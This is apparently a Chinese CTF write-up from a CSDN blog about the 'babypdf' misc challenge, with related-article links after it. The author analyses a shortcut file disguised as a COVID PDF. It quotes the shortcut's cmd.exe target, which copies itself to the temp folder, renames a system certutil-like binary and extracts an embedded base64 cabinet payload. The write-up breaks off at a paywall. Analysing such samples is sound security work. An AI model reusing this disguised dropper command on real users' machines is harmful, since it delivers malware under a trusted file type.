[HWS&DasCTF]misc

最新推荐文章于 2023-09-02 21:48:14 发布
最新推荐文章于 2023-09-02 21:48:14 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 比赛wp 文章标签: visual studio ide web安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/122660382
版权

babypdf

附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的
看一下目标

%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.

在tmp目录下找到g4ZokyumBB2gDn.tmp
有两段base64
在这里插入图片描述
上下两段解出来都是MSCF文件头,是后缀为cab的归档文件
在这里插入图片描述
第一个打不开,第二个打开出现了他加载的pdf
在这里插入图片描述

然后再tmp文件里面找到了这个

最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
HWS408 wifi芯片手册
04-13
### HWS408 Wi-Fi芯片相关知识点 #### 一、概述 HWS408是一种采用砷化镓(GaAs)技术的单刀双掷(SPDT)开关,其工作频率范围为直流至3GHz。该产品由Hexawave公司制造,并封装在一个低成本、无铅且符合RoHS标准的...
常见扩展名文件
小龙在线
11-03 715
常见扩展名文件使用 php 获取 magic bytes、 Mime类型。
Microsoft公司.CAB文件格式
amd k_7的专栏
02-06 1560
Microsoft公司 .CAB文件格式_Inside Windows Cabinet Files_Listing One// =================================================================// CAB FILE LAYOUT// ================================================
Microsoft公司 .CAB文件格式
benny1315的专栏
11-29 340
_Inside Windows Cabinet Files_Listing One// =================================================================// CAB FILE LAYOUT// =================================================================/*(1)
DASCTF2023】Misc mp3
Makabakahaha的博客
02-02 803
浅浅记录DASCTF初赛的一道misc题~
通过文件标识判断图片格式
热门推荐
xiaofei0859的专栏
04-01 1万+
通过文件标识判断图片格式 用Delphi从内存流中通过文件标识判断图片格式 文件标识大全: http://www.garykessler.net/library/file_sigs.html http://filext.com/index.php 图片的格式很多,一个图片文件的后缀名并不能说明这个图片的真正格式什么,那么如何获取图片的格式呢?我想到了几个
安恒hws物联网篇笔记
01-12
物联网安全是当前信息技术领域的重要议题,尤其是在硬件、通信和应用层面。硬件层面的安全风险主要涉及设备本身的物理安全性,如电子门锁可能受到强磁场干扰,导致设备失效。此外,硬件设计的安全性也是关键,比如...
HWS2017-FastCP
最新发布
11-05
附件
WeSplit-HWS
03-06
【标题】"WeSplit-HWS" 是一个基于Swift编程语言的项目,可能是一个应用程序或库,专注于实现分账或费用共享的功能。从项目名称来看,我们可以猜测它可能是一个帮助用户平分账单、管理共同消费的工具,尤其适用于...
LengthConversion-HWS
03-07
在这个名为"LengthConversion-HWS"的项目中,我们可以推断它涉及到长度单位转换的实现,可能是通过Swift编写的一个小型应用或代码示例。以下是对这个项目可能涉及的Swift编程知识点的详细解释: 1. **结构体...
CTF中常见的文件文件
爱党人士
08-28 9225
常见文件文件尾: JPEG (jpg), 文件:FFD8FF 文件尾:FF D9 PNG (png), 文件:89504E47 文件尾:AE 42 60 82 GIF (gif),    文件:47494638 或GIF89A                    文件尾:00 3B ZIP Archive (zip), 文件:504B0304              ...
常见文件
似水无痕
06-16 1380
255044 PDF 526563 EML D0CF11 PPT 4D5AEE COM E93B03 COM 4D5A90 EXE 424D3E BMP 49492A TIF 384250 PSD C5D0D3 EPS 0A0501 PCS 89504E PNG 060500 RAW 000002 TGA 60EA27 ARJ 526172 RAR 504B03 ZIP 495363 CAB 1F
根据文件数据,检测文件类型
sdragonx的专栏
09-06 1945
 这个函数,我会一直扩充下去。很多资料是网上查的,有自己分析的,当然肯定有bug。 目前疼的是mp3格式的检测,有的mp3文件前面有一些空白,而且长度不固定。 iso的鉴定方式貌似不对,我电脑上的几个iso貌似那个“CD001”的tag不在那几个地址。 mp4理论上能检测常见的一些内部格式,mp4内部格式支持的太多了。 折腾了两天,数据格式,从模板到代码标题上面注释的data_info方...
[dasctf]misc2
amber_o0k的博客
09-02 93
提取出来base解码即可。
[dasctf]misc04
amber_o0k的博客
09-02 323
flag.zip需要解压密码,在图片中发现一串密文。一串乱码,尝试进行字符编码爆破。获取到密码:简单的编码。第三届红明谷杯CTF-【MISC】-阿尼亚_keepb1ue的博客-CSDN客。密码为拼音(jiandanbianma),但是tmd你少打了个的啊。与他不说一模一样吧也差不多。里面编码随波逐流可破。
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2666
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
2020 DASCTF四月春季战-misc
weixin_43952190的博客
04-26 2008
misc 0x01 签到题 5G都来了,6G还远吗?6G下还需要开会员才能高速下载吗?请提交 DASCTF{} 里的内容。 下载发现有将近1G。作为签到题应该不需要这样做。 按下F12,接收到payload。 payload如下: REFTQ1RGe3dlbGNvbWVfdG9fREFTX0FwMXIxfc9Vo4jQqwH4ON+olEgxiijIjbgcdJur4VZjq9WlhUI...
编写-hws函数来判断参数是否为回文数
05-22
def hws(num): """ 判断一个数是否为回文数,如果是回文数返回 True,否则返回 False """ if is_palindrome(num): return True else: return False ``` 首先,我们定义了一个辅助函数 `is_palindrome`,它将...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值